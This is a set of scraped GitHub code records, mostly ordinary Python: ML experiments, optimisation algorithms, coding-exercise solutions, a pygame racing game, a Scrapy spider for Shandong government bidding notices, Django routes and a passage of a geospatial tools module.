int)\nparser.add_argument(\"--n_samples_eval\", default = 100, type = int)\nargs = parser.parse_args()\nparams = vars(args)\n\n\nif params[\"task\"] == \"australian\":\n src = 'data/australian_presplit/australian_scale_'\n \nelif params[\"task\"] == \"cancer\":\n src = 'data/breast_cancer_presplit/breast_cancer_scale_'\n \nelse:\n print(\"Sorry, I can do only australian and cancer for now\")\n\nX_train = pd.read_csv(src + 'X_tr.csv', delim_whitespace=True)\ny_train = pd.read_csv(src + 'y_tr.csv', delim_whitespace=True)\nX_test = pd.read_csv(src + 'X_te.csv', delim_whitespace=True)\ny_test = pd.read_csv(src + 'y_te.csv', delim_whitespace=True)\n\nX = torch.tensor(X_train.values, dtype = torch.float)\nX = torch.cat([X, torch.ones(X.shape[0], 1, dtype = torch.float)], dim = -1)\ny = torch.tensor(y_train.values, dtype = torch.float).view(-1)\ny[y == 0] = -1\nparams[\"N\"] = X.shape[0]\n \nX_test = torch.tensor(X_test.values, dtype = torch.float)\nX_test = torch.cat([X_test, torch.ones(X.shape[0], 1, dtype = torch.float)], dim = -1)\ny_test = torch.tensor(y_test.values, dtype = torch.float).view(-1)\ny_test[y_test == 0] = -1\n\n\nlosses = []\ntest_nlls = []\ncovars = []\nfinal_nlls = []\nfor rank in 
params[\"max_ranks\"]:\n model = LogisticRegression(X.shape[1], max_rank = rank)\n l, tl = train(model, X, y, params, X_test = X_test, y_test = y_test)\n covars.append(model.U @ model.U.t() + torch.diag(model.d))\n losses.append(l)\n test_nlls.append(tl)\n final_nlls.append(model.nll_loss(X_test, y_test, \n require_grads = False, \n n_samples = 2000).item())\n \nfull_model = LogisticRegressionFull(X.shape[1])\nlf, tlf = train(full_model, X, y, params, X_test = X_test, y_test = y_test)\ncovars.append(torch.inverse(full_model.Sigma))\nfinal_nlls.append(full_model.nll_loss(X_test, y_test, \n require_grads = False, \n n_samples = 2000).item())\n\nprint(final_nlls)\n\ndir = 'experiments/SLANG/lr'\nif not os.path.exists(dir):\n os.makedirs(dir)\n\nfig, axes = plt.subplots(ncols=2, figsize=(10, 3))\nfor i, l in enumerate(losses):\n axes[0].plot(np.log(np.arange(1, len(l[::20]) + 1)), l[::20], label = \"SLANG-{}\".format(params[\"max_ranks\"][i]))\naxes[0].plot(np.log(np.arange(1, len(lf[::20]) + 1)), lf[::20], label = 'Full-Gaussian')\naxes[0].legend()\naxes[0].set_title('Train Loss')\n\n\nfor i, l in enumerate(test_nlls):\n axes[1].plot(np.log(np.arange(1, len(l) + 1)), l, label = \"SLANG-{}\".format(params[\"max_ranks\"][i]))\naxes[1].plot(np.log(np.arange(1, len(tlf) + 1)), tlf, label = 'Full-Gaussian')\naxes[1].legend()\naxes[1].set_title('Test NLLS')\n\nfig.savefig(dir + '/NLLS.png')\n\nnames = ['SLANG-{}'.format(rank) for rank in params[\"max_ranks\"]]\nif params[\"do_full_model\"]:\n names += [\"Full\"]\nfor i, covar in enumerate(covars):\n plt.imsave(dir + '/' + names[i] + 'covar_inverse.png', covar.detach())\n plt.imsave(dir + '/' + names[i] + 'covar.png', torch.inverse(covar).detach())\n","repo_name":"lamantinushka/StructuredCovariance","sub_path":"run_slang_lr.py","file_name":"run_slang_lr.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"8676636588","text":"import time\nimport random\nimport math\n\ndef random_optimize(domain, fitness_function, n=9999):\n \"\"\"\n Optimizes overall schedule by creating n random guesses\n :param domain: list of (max,min) tuples\n specifying min and max values for each variable\n :param fitness_function: computes overall cost of a solution\n :return: best solution with the lowest cost\n :param n: max number of iterations\n \"\"\"\n best = None\n bestr = None\n for iter in range(n):\n # Create a random solution\n r=[random.randint(domain[i][0],domain[i][1])\n for i in range(len(domain))]\n \n # Get the cost\n cost=fitness_function(r)\n \n # Compare it to the best one so far\n if best is None or cost < best:\n best=cost\n bestr=r\n\n return r\n\n\ndef hillclimb_optimize(domain,fitness_function):\n # Create an initial random solution\n sol=[random.randint(domain[i][0],domain[i][1])\n for i in range(len(domain))]\n\n # Main loop\n while 1:\n # Create list of neighboring solutions\n neighbors=[]\n\n for j in range(len(domain)):\n # One away in each direction\n if sol[j]>domain[j][0]:\n neighbors.append(sol[0:j]+[sol[j]+1]+sol[j+1:])\n if sol[j] 0.1:\n # Choose one of the indices\n i = random.randint(0,len(domain)-1)\n\n # Choose a direction to change it\n dir = random.randint(-step,step)\n\n # Create a new list with one of the values changed\n vecb = vec[:]\n vecb[i] += dir\n if vecb[i] < domain[i][0]:\n vecb[i] = domain[i][0]\n elif vecb[i] > domain[i][1]:\n vecb[i] = domain[i][1]\n\n # Calculate the current cost and the new cost\n ea = 
fitness_function(vec)\n eb = fitness_function(vecb)\n p = pow(math.e,(-eb-ea)/T)\n\n # Is it better, or does it make the probability\n # cutoff?\n if eb < ea or random.random() < p:\n vec = vecb\n\n # Decrease the temperature\n T = T*cool\n\n return vec\n\n\ndef genetic_optimize(domain,fitness_function,\n popsize=100,step=1,\n mutprob=0.2,elite=0.2,n=100):\n # Mutation Operation\n def mutate(vec):\n i=random.randint(0,len(domain)-1)\n if random.random()<0.5 and vec[i]>domain[i][0]:\n return vec[0:i]+[vec[i]-step]+vec[i+1:]\n elif vec[i] List[int]:\n '''Defined hash table to keep track of all seen elements with their indices'''\n seen = {}\n for i in range(len(nums)):\n \n '''Using diff with target approach to find the second number in the array'''\n diff = target - nums[i]\n\n '''Return if the second number is seen'''\n if diff in seen:\n return [seen[diff], i]\n else:\n '''Else add what we saw'''\n seen[nums[i]] = i \n","repo_name":"Pihu1998/Leetcode_questions","sub_path":"two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29733343188","text":"#Car Racing Game\r\n#Inspired by Tech with Tim | https://www.youtube.com/watch?v=L3ktUWfAMPg\r\n#11/28/22\r\n#On Part 2 @0:00\r\n\r\nimport pygame\r\nimport time\r\nimport math\r\nfrom utils import scale_image,blit_rotate_center\r\n\r\n\r\n\r\n#load the images in\r\nGRASS = scale_image(pygame.image.load(\"images/lawn.png\"),2.5)\r\nTRACK = scale_image(pygame.image.load(\"images/track_small.png\"),1.1)\r\n\r\nTRACK_BORDER = scale_image(pygame.image.load(\"images/track_outline_small.png\"),1.1)\r\nFINISH = scale_image(pygame.image.load(\"images/finish_line.png\"),.1)\r\n\r\nRED_CAR = scale_image(pygame.image.load(\"images/red_car_small.png\"),.05)\r\nGREEN_CAR = scale_image(pygame.image.load(\"images/green_car_small.png\"),.03)\r\n\r\nWIDTH, HEIGHT = TRACK.get_width(), TRACK.get_height()\r\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption(\"Racing Game!\")\r\n\r\n#display images\r\nFPS = 60\r\n\r\nclass Abstract_Car:\r\n def __init__(self,max_vel,rotation_vel):\r\n self.max_vel = max_vel\r\n self.vel = 0 #determines the speed of the car\r\n self.rotation_vel = rotation_vel\r\n self.angle = 0\r\n self.img = self.IMG\r\n self.x, self.y = self.START_POS\r\n self.acceleration = 0.1\r\n \r\n def rotate(self,left=False, right=False):\r\n if left:\r\n self.angle += self.rotation_vel\r\n elif right:\r\n self.angle -= self.rotation_vel\r\n\r\n def draw(self,win):\r\n blit_rotate_center(win,self.img,(self.x,self.y),self.angle)\r\n\r\n def move_foward(self):\r\n self.vel = min(self.vel + self.acceleration, self.max_vel) # if the accerlation is greater than the max vel, it defaults to the max vel\r\n self.move()\r\n\r\n def move(self):\r\n radians = math.radians(self.angle)\r\n #check yucky trig pic\r\n vertical = math.cos(radians) * self.vel\r\n horizontal = math.sin(radians) * self.vel\r\n\r\n #plus returns positive values, makes car go foward, minus returns negative values, makes car go backwards\r\n self.y += vertical\r\n self.x += horizontal\r\n\r\n def reduce_speed(self):\r\n self.vel = max(self.vel-self.acceleration /2,0) #if the value is negative we dont wanna go backwards\r\n self.move()\r\n\r\nclass Player_Car(Abstract_Car):\r\n IMG = RED_CAR\r\n START_POS = (100,200)\r\n\r\ndef draw(win,images,player_Car):\r\n for img,pos in images:\r\n win.blit(img,pos)\r\n\r\n player_car.draw(win)\r\n 
pygame.display.update()\r\n\r\n\r\nrun = True\r\nclock = pygame.time.Clock()\r\nimages = [(GRASS, (0,0)),(TRACK, (0,0))]\r\nplayer_car = Player_Car(4,4)#higher the number the faster\r\n\r\nwhile run:\r\n clock.tick(FPS)\r\n\r\n draw(WIN,images,player_car)\r\n \r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n break\r\n\r\n keys = pygame.key.get_pressed()\r\n moved = False\r\n\r\n # rotating the car keys\r\n if keys[pygame.K_a]:\r\n player_car.rotate(left = True)\r\n if keys[pygame.K_d]:\r\n player_car.rotate(right = True)\r\n if keys[pygame.K_w]:\r\n moved = True\r\n player_car.move_foward()\r\n\r\n if not moved:\r\n player_car.reduce_speed()\r\n\r\n \r\npygame.quit() ","repo_name":"Bahrens96/Car_racing_game","sub_path":"Racing Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37438105678","text":"# Faire un programme python qui construit des pyramide d’étoile. Le programme demande à l’utilisateur le nombre de ligne et le programme dessine une pyramide.\r\n\r\nvaleurInitiale = int(input(\"Choississez votre nombre de ligne \")) \r\n\r\nstar = 1 \r\nspace = valeurInitiale - 1\r\nline = 0\r\n\r\nwhile line < valeurInitiale:\r\n\r\n print(space * \" \", star * \"*\")\r\n star = star + 2\r\n space = space - 1\r\n line = line + 1","repo_name":"Charlymaitre/30exo_python","sub_path":"30.py","file_name":"30.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8853178516","text":"n = int(input())\n\nif n == 1:\n print(1)\n exit(0)\nif n == 2:\n print(2)\n exit(0)\n\ncache = [0] * 3\ncache[0] = 1\ncache[1] = 2\ncount = 2\nwhile count != n:\n cache[2] = cache[1] + cache[0]\n cache[0], cache[1] = cache[1], cache[2]\n count += 1\n\nprint(cache[1] % 15746)\n\n# 흔한 dp 피보나치 문제인데, 메모리를 빡빡하게 줘서 memoization의 메모리를 최소화했다.\n# dp의 큰 특징은 작은 부분 -> 큰부분으로 확장되는 점화식이 있다는 것과 메모이제이션.\n","repo_name":"taehwan920/Algorithm","sub_path":"baekjoon/1904_01tile.py","file_name":"1904_01tile.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20351328048","text":"import ast\n\ndef pairwise(t):\n it = iter(t)\n return zip(it,it)\n\nclass Land(object):\n def __init__(self,length,breadth):\n \"\"\"\n Create the matrix with a complete fertile land of x*y\n x is length\n y is breadth\n Matrix will be filled with 1s\n \"\"\"\n self.length = length\n self.breadth = breadth\n self.land = self._creatematrix(length,breadth)\n\n def _creatematrix(self,length,breadth,value=1):\n land = [[value for x in range(breadth)] for y in range(length)]\n return land\n\n def create_barren_land(self,left_bottom_corner,right_top_corner):\n \"\"\"\n Fill the barren land with 0\n We can calculate the coordinates with the corners that were given \n\n \"\"\"\n for x in range(left_bottom_corner[0],right_top_corner[0]+1):\n for y in range(left_bottom_corner[1],right_top_corner[1]+1):\n self.land[x][y] = 0\n\n def fill_barren_land(self,coordinates):\n \"\"\"\n Fill the barren land with the coordinates in a list\n \"\"\"\n for coord in coordinates:\n self.create_barren_land(coord[0],coord[1])\n\n def fertile_area(self):\n \"\"\"\n DFS \n Returns the area of all islands with 1s\n\n \"\"\"\n visited = set()\n result = []\n for r0, row in enumerate(self.land):\n for c0, val in 
enumerate(row):\n if val and (r0, c0) not in visited:\n stack = [(r0, c0)]\n visited.add((r0, c0))\n area = 0\n while stack:\n r, c = stack.pop()\n area += 1\n for nr, nc in ((r-1, c), (r+1, c), (r, c-1), (r, c+1)):\n if (0 <= nr < self.length and 0 <= nc < self.breadth\n and self.land[nr][nc] and (nr, nc) not in visited):\n stack.append((nr, nc))\n visited.add((nr, nc))\n result.append(area)\n result.sort()\n return result\n\ndef format_input(input_str):\n \"\"\"\n Format the inpurt strings into a valid list \n \n Input\n {\"48 192 351 207\", \"48 392 351 407\",\"120 52 135 547\", \"260 52 275 547\"}\n\n Output \n [[(48, 392), (351, 407)], [(48, 192), (351, 207)], [(120, 52), (135, 547)], [(260, 52), (275, 547)]]\n\n \"\"\"\n input_str = ast.literal_eval(input_str)\n landcorners = []\n y = lambda x: [(int(x[0]), int(x[1])), (int(x[2]), int(x[3]))]\n for point_str in input_str:\n landcorners.append(y(point_str.split()))\n return landcorners\n\n\n\nif __name__ == '__main__':\n barrenland_str = input(\"Do input the string of coordinates \\n\")\n land_obj = Land(400,600)\n barrenland_coord = format_input(barrenland_str)\n \n land_obj.fill_barren_land(barrenland_coord)\n result = land_obj.fertile_area()\n print(\" \".join(str(area) for area in result)) \n","repo_name":"phanichand/barrenland","sub_path":"barrenland.py","file_name":"barrenland.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"30377194768","text":"from typing import List\n\n\nclass Solution:\n @staticmethod\n def coord_is_out_of_range(\n grid: List[List[str]],\n x: int,\n y: int,\n ):\n # 가로길이, 세로길이에 각각 대응해야함에 유의!\n x_is_out_of_range = x < 0 or x >= len(grid)\n y_is_out_of_range = y < 0 or y >= len(grid[0])\n\n return (x_is_out_of_range or y_is_out_of_range)\n\n def dfs(\n self,\n grid: List[List[str]],\n x: int,\n y: int,\n ):\n # 더 이상 땅이 아닌 경우?\n if self.coord_is_out_of_range(grid, x, y) or grid[x][y] != '1':\n return\n\n # 다녀온 곳에 대해 '1'이 아닌 값으로 덮어쓴다.\n grid[x][y] = '#'\n\n self.dfs(grid, x+1, y)\n self.dfs(grid, x-1, y)\n self.dfs(grid, x, y+1)\n self.dfs(grid, x, y-1)\n\n def numIslands(\n self,\n grid: List[List[str]],\n ) -> int:\n\n # 예외처리\n if not grid:\n return 0\n\n count = 0\n\n # 가로길이, 세로길이에 각각 대응해야함에 유의!\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '1':\n self.dfs(grid, i, j)\n count += 1\n\n return count\n\n\ntest1 = [\n [\"1\", \"1\", \"1\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"1\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"0\", \"0\"],\n]\n\ntest2 = [\n [\"1\", \"1\", \"0\", \"0\", \"0\"],\n [\"1\", \"1\", \"0\", \"0\", \"1\"],\n [\"0\", \"0\", \"1\", \"0\", \"0\"],\n [\"0\", \"0\", \"0\", \"1\", \"0\"],\n]\n\n\nanswer = Solution()\nprint(answer.numIslands(test1))\nprint(answer.numIslands(test2))\n","repo_name":"s3ich4n/coding_interview_self_taught","sub_path":"codes/pt4/12_graph/q32/32_number_of_islands.py","file_name":"32_number_of_islands.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20230662629","text":"import json\nimport scrapy\nfrom lxml import etree\nfrom scrapy import FormRequest\nfrom scrapy.selector import Selector\nfrom BiddingInfoSpider.spiders.base_spider import BaseSpider\nfrom BiddingInfoSpider.items import BiddinginfospiderItem\n\n\nclass ShanDongGJBW(BaseSpider):\n name = 'ShanDongGJBW'\n allowed_domains = 
['gxt.shandong.gov.cn']\n start_urls = ['http://gxt.shandong.gov.cn/col/col15177/index.html']\n website_name = '山东省工业和信息化-国家部委'\n tmpl_url = 'http://ggzyjyzx.shandong.gov.cn/module/web/jpage/dataproxy.jsp?page={0}&webid=78&path=http://gxt.shandong.gov.cn/&columnid=15177&unitid=71078&webname=%25E5%25B1%25B1%25E4%25B8%259C%25E7%259C%2581%25E5%25B7%25A5%25E4%25B8%259A%25E5%2592%258C%25E4%25BF%25A1%25E6%2581%25AF%25E5%258C%2596%25E5%258E%2585&permissiontype=0'\n\n def parse_start_url(self, response):\n datastore = response.xpath('//script[@type=\"text/xml\"]/text()').get()\n # selector = etree.XML(response.body)\n if datastore:\n selector = etree.XML(datastore)\n a = selector.xpath('//nextgroup/text()')[0]\n href = etree.HTML(a).xpath('//a/@href')[0]\n req = self.make_requests_from_url(response.urljoin(href))\n req.callback = self.parse_shangdong_xml\n yield req\n\n def parse_shangdong_xml(self, response):\n # response已经完成返回xml的解析\n # datastore = etree.XML(response.text)\n html = ''.join(response.xpath('//record/text()').extract())\n\n # 产生内容页的请求\n for li in etree.HTML(html).xpath('//li'):\n item = BiddinginfospiderItem()\n a = li.xpath(\".//a\")[0]\n item['href'] = a.xpath(\".//@href\")[0]\n item['title'] = a.xpath(\".//text()\")[0]\n item['ctime'] = li.xpath('.//span//text()')[0]\n # print(item)\n yield item\n # 如果是全部爬取则继续获取下一页\n if not self.biddingInfo_update:\n selector = etree.XML(response.body)\n a = [0]\n next_select = selector.xpath('//nextgroup/text()')\n if next_select:\n a = next_select[0]\n href = etree.HTML(a).xpath('//a/@href')[0]\n req = self.make_requests_from_url(response.urljoin(href))\n req.callback = self.parse_shangdong_xml\n yield req\n\n\nclass ShanDongSWZF(ShanDongGJBW):\n name = 'ShanDongSWZF'\n start_urls = ['http://gxt.shandong.gov.cn/col/col15178/index.html']\n website_name = '山东省工业和信息化-省委政府'\n\n\nclass ShanDongBT(ShanDongGJBW):\n name = 'ShanDongBT'\n start_urls = ['http://gxt.shandong.gov.cn/col/col15178/index.html']\n website_name = '山东省工业和信息化-本厅'\n","repo_name":"LeeeetMe/BiddingInfo","sub_path":"BiddingInfoSpider/spiders/工信/ShanDongGJBW.py","file_name":"ShanDongGJBW.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"9746285416","text":"from django.urls import include, path\r\nfrom rest_framework.routers import DefaultRouter\r\n\r\nfrom .views import CommentViewSet, LikePostAPIView, PostViewSet, RatingViewSet\r\n\r\napp_name = 'posts'\r\n\r\nrouter = DefaultRouter()\r\nrouter.register(r'ratings', RatingViewSet)\r\nrouter.register(r'^(?P\\d+)/comment', CommentViewSet)\r\nrouter.register(r'', PostViewSet)\r\n\r\nurlpatterns = [\r\n path('', include(router.urls)),\r\n path('like//', LikePostAPIView.as_view(), name='like-post'),\r\n]\r\n","repo_name":"Russo2642/job_solution","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"37119636645","text":"## dea_spatialtools.py\n\"\"\"\nTools for spatially manipulating Digital Earth Australia data.\n\nLicense: The code in this notebook is licensed under the Apache License, \nVersion 2.0 (https://www.apache.org/licenses/LICENSE-2.0). 
Digital Earth \nAustralia data is licensed under the Creative Commons by Attribution 4.0 \nlicense (https://creativecommons.org/licenses/by/4.0/).\n\nContact: If you need assistance, please post a question on the Open Data \nCube Slack channel (http://slack.opendatacube.org/) or on the GIS Stack \nExchange (https://gis.stackexchange.com/questions/ask?tags=open-data-cube) \nusing the `open-data-cube` tag (you can view previously asked questions \nhere: https://gis.stackexchange.com/questions/tagged/open-data-cube). \n\nIf you would like to report an issue with this script, file one on \nGithub: https://github.com/GeoscienceAustralia/dea-notebooks/issues/new\n\nLast modified: August 2023\n\n\"\"\"\n\n# Import required packages\nimport dask\nimport fiona\nimport warnings\nimport collections\nimport odc.geo.xr\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport geopandas as gpd\nimport rasterio.features\nimport scipy.interpolate\nimport multiprocessing as mp\nfrom odc.geo.geom import Geometry\nfrom odc.geo.crs import CRS\nfrom scipy import ndimage as nd\nfrom skimage.measure import label\nfrom rasterstats import zonal_stats\nfrom skimage.measure import find_contours\nfrom geopy.geocoders import Nominatim\nfrom geopy.exc import GeocoderUnavailable, GeocoderServiceError\n\nfrom datacube.utils.cog import write_cog\nfrom shapely.geometry import LineString, MultiLineString, shape, mapping\n\n\ndef points_on_line(gdf, index, distance=30):\n \"\"\"\n Generates evenly-spaced point features along a specific line feature\n in a `geopandas.GeoDataFrame`.\n Parameters:\n -----------\n gdf : geopandas.GeoDataFrame\n A `geopandas.GeoDataFrame` containing line features with an\n index and CRS.\n index : string or int\n An value giving the index of the line to generate points along\n distance : integer or float, optional\n A number giving the interval at which to generate points along\n the line feature. Defaults to 30, which will generate a point\n at every 30 metres along the line.\n Returns:\n --------\n points_gdf : geopandas.GeoDataFrame\n A `geopandas.GeoDataFrame` containing point features at every\n `distance` along the selected line.\n \"\"\"\n\n # Select individual line to generate points along\n line_feature = gdf.loc[[index]].geometry\n\n # If multiple features are returned, take unary union\n if line_feature.shape[0] > 0:\n line_feature = line_feature.unary_union\n else:\n line_feature = line_feature.iloc[0]\n\n # Generate points along line and convert to geopandas.GeoDataFrame\n points_line = [\n line_feature.interpolate(i)\n for i in range(0, int(line_feature.length), distance)\n ]\n points_gdf = gpd.GeoDataFrame(geometry=points_line, crs=gdf.crs)\n\n return points_gdf\n\n\ndef add_geobox(ds, crs=None):\n \"\"\"\n Ensure that an xarray DataArray has a GeoBox and .odc.* accessor\n using `odc.geo`.\n\n If `ds` is missing a Coordinate Reference System (CRS), this can be\n supplied using the `crs` param.\n\n Parameters\n ----------\n ds : xarray.Dataset or xarray.DataArray\n Input xarray object that needs to be checked for spatial\n information.\n crs : str, optional\n Coordinate Reference System (CRS) information for the input `ds`\n array. 
If `ds` already has a CRS, then `crs` is not required.\n Default is None.\n\n Returns\n -------\n xarray.Dataset or xarray.DataArray\n The input xarray object with added `.odc.x` attributes to access\n spatial information.\n\n \"\"\"\n\n # Import the odc-geo package to add `.odc.x` attributes\n # to our input xarray object\n import odc.geo.xr\n\n # If a CRS is not found, use custom provided CRS\n if ds.odc.crs is None and crs is not None:\n ds = ds.odc.assign_crs(crs)\n elif ds.odc.crs is None and crs is None:\n raise ValueError(\n \"Unable to determine `ds`'s coordinate \"\n \"reference system (CRS). Please provide a \"\n \"CRS using the `crs` parameter \"\n \"(e.g. `crs='EPSG:3577'`).\"\n )\n\n return ds\n\n\ndef xr_vectorize(\n da,\n attribute_col=None,\n crs=None,\n dtype=\"float32\",\n output_path=None,\n verbose=True,\n **rasterio_kwargs,\n):\n \"\"\"\n Vectorises a raster ``xarray.DataArray`` into a vector\n ``geopandas.GeoDataFrame``.\n\n Parameters\n ----------\n da : xarray.DataArray\n The input ``xarray.DataArray`` data to vectorise.\n attribute_col : str, optional\n Name of the attribute column in the resulting\n ``geopandas.GeoDataFrame``. Values from ``da`` converted\n to polygons will be assigned to this column. If None,\n the column name will default to 'attribute'.\n crs : str or CRS object, optional\n If ``da``'s coordinate reference system (CRS) cannot be\n determined, provide a CRS using this parameter.\n (e.g. 'EPSG:3577').\n dtype : str, optional\n Data type of must be one of int16, int32, uint8, uint16,\n or float32\n output_path : string, optional\n Provide an optional string file path to export the vectorised\n data to file. Supports any vector file formats supported by\n ``geopandas.GeoDataFrame.to_file()``.\n verbose : bool, optional\n Print debugging messages. 
Default True.\n **rasterio_kwargs :\n A set of keyword arguments to ``rasterio.features.shapes``.\n Can include `mask` and `connectivity`.\n\n Returns\n -------\n gdf : geopandas.GeoDataFrame\n\n \"\"\"\n\n # Add GeoBox and odc.* accessor to array using `odc-geo`\n da = add_geobox(da, crs)\n\n # Run the vectorizing function\n vectors = rasterio.features.shapes(\n source=da.data.astype(dtype), transform=da.odc.transform, **rasterio_kwargs\n )\n\n # Convert the generator into a list\n vectors = list(vectors)\n\n # Extract the polygon coordinates and values from the list\n polygons = [polygon for polygon, value in vectors]\n values = [value for polygon, value in vectors]\n\n # Convert polygon coordinates into polygon shapes\n polygons = [shape(polygon) for polygon in polygons]\n\n # Create a geopandas dataframe populated with the polygon shapes\n attribute_name = attribute_col if attribute_col is not None else \"attribute\"\n gdf = gpd.GeoDataFrame(\n data={attribute_name: values}, geometry=polygons, crs=da.odc.crs\n )\n\n # If a file path is supplied, export to file\n if output_path is not None:\n if verbose:\n print(f\"Exporting vector data to {output_path}\")\n gdf.to_file(output_path)\n\n return gdf\n\n\ndef xr_rasterize(\n gdf,\n da,\n attribute_col=None,\n crs=None,\n name=None,\n output_path=None,\n verbose=True,\n **rasterio_kwargs,\n):\n \"\"\"\n Rasterizes a vector ``geopandas.GeoDataFrame`` into a\n raster ``xarray.DataArray``.\n\n Parameters\n ----------\n gdf : geopandas.GeoDataFrame\n A ``geopandas.GeoDataFrame`` object containing the vector\n data you want to rasterise.\n da : xarray.DataArray or xarray.Dataset\n The shape, coordinates, dimensions, and transform of this object\n are used to define the array that ``gdf`` is rasterized into.\n It effectively provides a spatial template.\n attribute_col : string, optional\n Name of the attribute column in ``gdf`` containing values for\n each vector feature that will be rasterized. If None, the\n output will be a boolean array of 1's and 0's.\n crs : str or CRS object, optional\n If ``da``'s coordinate reference system (CRS) cannot be\n determined, provide a CRS using this parameter.\n (e.g. 'EPSG:3577').\n name : str, optional\n An optional name used for the output ``xarray.DataArray`.\n output_path : string, optional\n Provide an optional string file path to export the rasterized\n data as a GeoTIFF file.\n verbose : bool, optional\n Print debugging messages. Default True.\n **rasterio_kwargs :\n A set of keyword arguments to ``rasterio.features.rasterize``.\n Can include: 'all_touched', 'merge_alg', 'dtype'.\n\n Returns\n -------\n da_rasterized : xarray.DataArray\n The rasterized vector data.\n \"\"\"\n\n # Add GeoBox and odc.* accessor to array using `odc-geo`\n da = add_geobox(da, crs)\n\n # Reproject vector data to raster's CRS\n gdf_reproj = gdf.to_crs(crs=da.odc.crs)\n\n # If an attribute column is specified, rasterise using vector\n # attribute values. 
Otherwise, rasterise into a boolean array\n if attribute_col is not None:\n # Use the geometry and attributes from `gdf` to create an iterable\n shapes = zip(gdf_reproj.geometry, gdf_reproj[attribute_col])\n else:\n # Use geometry directly (will produce a boolean numpy array)\n shapes = gdf_reproj.geometry\n\n # Rasterise shapes into a numpy array\n im = rasterio.features.rasterize(\n shapes=shapes,\n out_shape=da.odc.geobox.shape,\n transform=da.odc.geobox.transform,\n **rasterio_kwargs,\n )\n\n # Convert numpy array to a full xarray.DataArray\n # and set array name if supplied\n da_rasterized = odc.geo.xr.wrap_xr(im=im, gbox=da.odc.geobox)\n da_rasterized = da_rasterized.rename(name)\n\n # If a file path is supplied, export to file\n if output_path is not None:\n if verbose:\n print(f\"Exporting raster data to {output_path}\")\n write_cog(da_rasterized, output_path, overwrite=True)\n\n return da_rasterized\n\n\ndef subpixel_contours(\n da,\n z_values=[0.0],\n crs=None,\n attribute_df=None,\n output_path=None,\n min_vertices=2,\n dim=\"time\",\n time_format=\"%Y-%m-%d\",\n errors=\"ignore\",\n verbose=True,\n):\n \"\"\"\n Uses `skimage.measure.find_contours` to extract multiple z-value\n contour lines from a two-dimensional array (e.g. multiple elevations\n from a single DEM), or one z-value for each array along a specified\n dimension of a multi-dimensional array (e.g. to map waterlines\n across time by extracting a 0 NDWI contour from each individual\n timestep in an xarray timeseries).\n\n Contours are returned as a geopandas.GeoDataFrame with one row per\n z-value or one row per array along a specified dimension. The\n `attribute_df` parameter can be used to pass custom attributes\n to the output contour features.\n\n Last modified: May 2023\n\n Parameters\n ----------\n da : xarray DataArray\n A two-dimensional or multi-dimensional array from which\n contours are extracted. If a two-dimensional array is provided,\n the analysis will run in 'single array, multiple z-values' mode\n which allows you to specify multiple `z_values` to be extracted.\n If a multi-dimensional array is provided, the analysis will run\n in 'single z-value, multiple arrays' mode allowing you to\n extract contours for each array along the dimension specified\n by the `dim` parameter.\n z_values : int, float or list of ints, floats\n An individual z-value or list of multiple z-values to extract\n from the array. If operating in 'single z-value, multiple\n arrays' mode specify only a single z-value.\n crs : string or CRS object, optional\n If ``da``'s coordinate reference system (CRS) cannot be\n determined, provide a CRS using this parameter.\n (e.g. 'EPSG:3577').\n output_path : string, optional\n The path and filename for the output shapefile.\n attribute_df : pandas.Dataframe, optional\n A pandas.Dataframe containing attributes to pass to the output\n contour features. The dataframe must contain either the same\n number of rows as supplied `z_values` (in 'multiple z-value,\n single array' mode), or the same number of rows as the number\n of arrays along the `dim` dimension ('single z-value, multiple\n arrays mode').\n min_vertices : int, optional\n The minimum number of vertices required for a contour to be\n extracted. The default (and minimum) value is 2, which is the\n smallest number required to produce a contour line (i.e. a start\n and end point). 
Higher values remove smaller contours,\n potentially removing noise from the output dataset.\n dim : string, optional\n The name of the dimension along which to extract contours when\n operating in 'single z-value, multiple arrays' mode. The default\n is 'time', which extracts contours for each array along the time\n dimension.\n time_format : string, optional\n The format used to convert `numpy.datetime64` values to strings\n if applied to data with a \"time\" dimension. Defaults to\n \"%Y-%m-%d\".\n errors : string, optional\n If 'raise', then any failed contours will raise an exception.\n If 'ignore' (the default), a list of failed contours will be\n printed. If no contours are returned, an exception will always\n be raised.\n verbose : bool, optional\n Print debugging messages. Default is True.\n\n Returns\n -------\n output_gdf : geopandas geodataframe\n A geopandas geodataframe object with one feature per z-value\n ('single array, multiple z-values' mode), or one row per array\n along the dimension specified by the `dim` parameter ('single\n z-value, multiple arrays' mode). If `attribute_df` was\n provided, these values will be included in the shapefile's\n attribute table.\n \"\"\"\n\n def _contours_to_multiline(da_i, z_value, min_vertices=2):\n \"\"\"\n Helper function to apply marching squares contour extraction\n to an array and return a data as a shapely MultiLineString.\n The `min_vertices` parameter allows you to drop small contours\n with less than X vertices.\n \"\"\"\n\n 